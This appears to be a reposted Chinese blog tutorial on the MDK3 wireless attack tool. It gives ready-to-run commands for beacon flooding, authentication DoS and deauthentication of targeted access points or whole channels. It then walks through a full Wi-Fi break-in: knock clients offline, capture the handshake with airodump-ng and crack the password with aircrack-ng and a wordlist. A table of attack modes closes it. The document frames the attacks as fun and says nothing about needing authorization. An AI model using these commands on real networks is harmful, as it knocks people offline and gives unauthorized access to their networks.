admin管理员组文章数量:1620395
MDK3
MDK3 是一款无线DOS 攻击测试工具,能够发起Beacon Flood、Authentication DoS、Deauthentication/Disassociation Amok 等模式的攻击,另外它还具有针对隐藏ESSID 的暴力探测模式、802.1X 渗透测试等功能
安装MDK3
sudo apt-get install mdk3
准备工作
连接网卡:
ifconfig # 查找一个网卡 假如是wlan0
切换网卡为监听模式(monitor):
airmon-ng start wlan0
AP扫描:
airmon-ng wlan0
mdk3创建虚拟wifi
创建一个虚拟wifi
输入下面命令来创建一个叫做“test_wifi”虚拟wifi。
mdk3 wlan0mon b -n test_wifi
或
sudo mdk3 wlan0mon b -n 测试test_wifi -t -c 6 -s 80
b -n:指定wifi名字
创建大量虚拟wifi
输入下面命令来创建大量在信道为1随机名字的wifi
mdk3 wlan0mon b -g -c 1
不一会,就创建了几十个wifi。
该命令会在无线接口 wlan0mon 上使用 Beacon Flood Mode(信标洪泛模式)攻击,
目标为 BSSID 地址为 b,
攻击信道为 1。
其中 -g 参数表示使用泛洪模式,
即不断发送带有随机 SSID 和 MAC 地址的信标广播包,以干扰目标网络。通过这种方式可以使目标AP在所有连接设备之外都变得不可用,从而对目标网络造成干扰或攻击。
读取本地文件创建
names.txt
内容
白日依山尽
黄河入海流
欲穷千里目
更上一层楼
mdk3 wlan0mon b -f /root/names.txt -c 6 -s 1000
该命令会在无线接口 wlan0mon 上使用 Beacon Flood Mode(信标洪泛模式)攻击,目标为随机 BSSID,攻击信道为 6,同时将随机生成的 SSID 使用 /root/names.txt 文件中的内容进行替换,1000ms。可以通过这种方式向附近的设备广播大量的热点信息,以干扰和误导目标网络的用户。
扫描连接wifi的设备
使用下面命令可以扫描连接wifi的设备。请自行替换目标wifi名字
mdk3 wlan0mon w -e <SSID>
向指定AP进行Dos攻击
这是一种验证请求攻击模式:在这个模式里,软件自动模拟随机产生的mac向目标AP发起大量验证请求,可以导致AP忙于处理过多的请求而停止对正常连接客户端的响应;这个模式常见的使用是在reaver穷据路由PIN码,当遇到AP被“pin死”时,可以用这个模式来直接让AP停止正常响应,迫使AP主人重启路由,对于有些路由器防DOS的这个不好用。
输入下面命令,向指定AP发起DOS攻击。请自行替换目标MAC地址。
mdk3 wlan0mon a -a [MAC]
这个攻击对于我的路由器貌似没什么效果,可能是我的路由器防DoS或者是攻击时间太短请求都能够正常处理。
向指定AP发起取消认证攻击
攻击单一Ap
使用以下命令可以强制解除验证解除连接的设备。请自行替换目标MAC地址
mdk3 wlan0mon d 76:87:4E:74:34:06
该命令使用MDK3的Deauthentication Mode(强制下线模式)针对指定的MAC地址(76:87:4E:74:34:06)进行攻击。在攻击期间,MDK3会发送大量的deauth帧,以迫使目标设备断开与Wi-Fi网络的连接。
信道(ch)攻击AP
在这个模式下,软件会向周围所有可见AP发起循环攻击…可以造成一定范围内的无线网络瘫痪(当然有白名单,黑名单模式),直到手动停止攻击
mdk3 wlan0mon d -c 11
该命令使用MDK3的Deauthentication Mode(强制下线模式)对Wi-Fi信道11上所有连接的设备进行攻击。在攻击期间,MDK3会发送大量的deauth帧,以迫使目标设备断开与Wi-Fi网络的连接。
快ctrl c停止,不然别人来找你了!
mdk3实现无线网络攻击
步骤一:使用mdk3强制解除验证解除连接的设备
利用mdk3对指定AP进行攻击,发送取消认证数据包,解除连接在AP上的设备
mdk3 wlan0mon d 76:87:4E:74:34:06
这个时候wifi已经连接失败!
步骤二:获取握手数据包
airodump-ng -c 1 --bssid 76:87:4E:74:34:06 -w /home/gyp-202031070222/桌面/wifi2 wlan0mon
步骤三:密码字典破解wifi密码
aircrack-ng -w /usr/share/wordlists/rockyou.txt /home/gyp-202031070222/桌面/wifi2-01.cap
其实原理和之前的deauth攻击差不多,让其断开连接后获取握手数据包,然后密码字典破解
模式
b:伪造 AP
发射伪造的AP,可能造成网络扫描程序或者驱动程序崩溃
参数 说明 -n [ssid] 指定ssid,否则随机生产 -f [filename] 从文件中读取 SSID 列表 -v [filename] 从文件中读取 SSID 和 MAC 地址列表 -d 显示站点为点对点(Ad-Hoc) -w 设置热点为 WEP 加密模式 -g 显示站点为 54 Mbit -t 显示站点为 WPA TKIP 加密 -a 显示站点为 WPE AES 加密 -m 使用 OUI 数据库的有效 MAC 地址 -h 伪造则信道跳动,测试某些设备和驱动,但信道跳动会降低分组速率 -c [chan] 在此信道伪造 AP,如果你想让你的网卡跳到这个信道则必须设置 -h -s [pps] 每秒发包速率,默认为50
a:身份验证 DoS
身份验证 DoS 攻击
参数 说明 -a [ap_mac] 只攻击指定 MAC 的 AP -m 使用 OUI 数据库的有效 MAC 地址 -c 不检测是否成功 -i [ap_mac] 在AP 上智能测试,-a 和 -c 选项将忽略 -s [pps] 发包率,默认不限制
p:ESSID 穷举
基本侦测和ESSID穷举
参数 说明 -e [ssid] 指定 SSID -f [filename] 从文件读取 SSID 并且 BF 算法匹配隐藏的 SSID(BF=Brute force) -t [bssid] 设置目标 AP 的 MAC 地址 -s [pps] 发包率,默认无限制,BF 为 300 -b [character set] 字符集,使用完整的 BF 模式(建议仅使用Short SSIDs)制
d:掉线攻击
解除认证,强迫连接 AP 的每台设备掉线
参数 说明 -w [filename] 白名单 MAC 地址文件,免受攻击 -b [filename] 黑名单 MAC 地址文件,攻击对象 -s [pps] 发包率,默认不限制 -c [chan,chan,chan,…] 信道跳动,每5秒一次
m:取消流量
Michael shutdown,连续取消所有流量
参数 说明 -t [bssid] 设置目标 AP 的 MAC 地址 -w [seconds] 每次爆破间隔时间,默认10秒 -n [ppb] 每次爆破发送包,默认70 -j 使用新的 TKIP Qos-Exploit,仅需要几个包就可以关闭 AP -s [pps] 发包率,默认400
w:扰乱路由表
WIDS / WIPS / WDS 多认证搅乱路由表
参数 说明 -e [ssid] AP SSID -c [chan,chan,chan…] 信道 -z [ppb] 激活 Zero_Chaos’WIDS 开发
f:MAC 暴力破解
MAC 地址过滤暴力破解。对已知的客户端 MAC 地址尝试在动态变化时对给定 AP 进行身份验证
参数 说明 -t [bssid] BSSID -m [mac] 设置 MAC 地址使用范围(3 bytes,i.e. 00:12:34)没有 -m 选项将使用内部数据库 -f [mac] 设置 MAC 地址的开始,-f 和 -m 不能同时使用
g:WPA 降级测试
WPA 降级测试,不验证站点和 AP 发送 WPA 加密的数据包,尝试设置为 WPE 加密或者不加密,mdk3 会让 WPE 或者未加密的客户端工作
参数 说明 -t [bssid] BSSID
版权声明:本文标题:好玩的AP扰乱MDK3 内容由热心网友自发贡献,该文观点仅代表作者本人, 转载请联系作者并注明出处:https://www.elefans.com/xitong/1728819882a1175295.html, 本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如发现本站有涉嫌抄袭侵权/违法违规的内容,一经查实,本站将立刻删除。
发表评论